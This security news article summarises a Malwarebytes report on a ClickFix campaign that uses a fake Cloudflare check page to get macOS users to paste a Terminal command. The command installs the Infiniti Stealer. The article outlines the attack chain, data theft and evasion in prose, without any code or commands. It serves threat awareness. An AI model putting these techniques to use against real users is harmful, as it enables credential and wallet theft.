Malwarebytes has reported a fresh ClickFix campaign targeting macOS users, utilizing a Cloudflare-themed verification page to deliver a Python-based information stealer.
The Attack Chain
The infection chain begins with a fake CAPTCHA page, which serves a legitimate-looking Cloudflare human verification page asking visitors to paste and execute a command in Terminal.
Referred to as ClickFix, the technique relies on social engineering to trick users into executing malicious commands on their devices. This technique has been widely used in attacks since August 2024, mainly against Windows users.
The Fake Verification Page
The fake verification page provides macOS users with specific instructions to open the Terminal and paste and execute a fake verification command that triggers malware execution.
Once the victim runs the command, a Bash script is fetched from a remote server. The script decodes an embedded payload, writes the second stage binary to a temporary folder, removes its quarantine flag, and executes it.
The Loader and Payload
The script also passes command-and-control (C&C) server and authentication tokens as environment variables, deletes itself, and closes the Terminal.
The binary dropped by the script is a loader compiled using Nuitka. The compiler transforms Python code into a native binary, making static analysis more difficult.
At runtime, the loader decompresses embedded data and launches the final payload, identified as the Infiniti Stealer malware.
The Infiniti Stealer
The Python-based information stealer targets browser credentials, Keychain information, cryptocurrency wallets, secrets stored in developer files, and screenshots captured during execution.
The data is sent to the C&C via HTTP POST requests. Once the operation has been completed, the malware sends a notification to a Telegram channel and queues captured credentials to be cracked on the server.
Evasion Techniques
For evasion, Infiniti Stealer relies on randomized execution delay and checks if the system is a known analysis environment.
“Infiniti Stealer shows how techniques that worked on Windows—like ClickFix—are now being adapted to target Mac users. It also uses newer techniques, like compiling Python into native apps, which makes the malware harder to detect and analyze. If this approach proves effective, we may see more attacks like this,” Malwarebytes notes.
Conclusion
The ClickFix campaign targeting macOS users is a concerning development, as it demonstrates the adaptability of malware authors in targeting different platforms.
It is essential for users to remain vigilant and exercise caution when interacting with unfamiliar websites or commands, as even seemingly legitimate requests can be malicious.
By staying informed and taking proactive measures to secure their devices, users can reduce the risk of falling victim to such attacks.
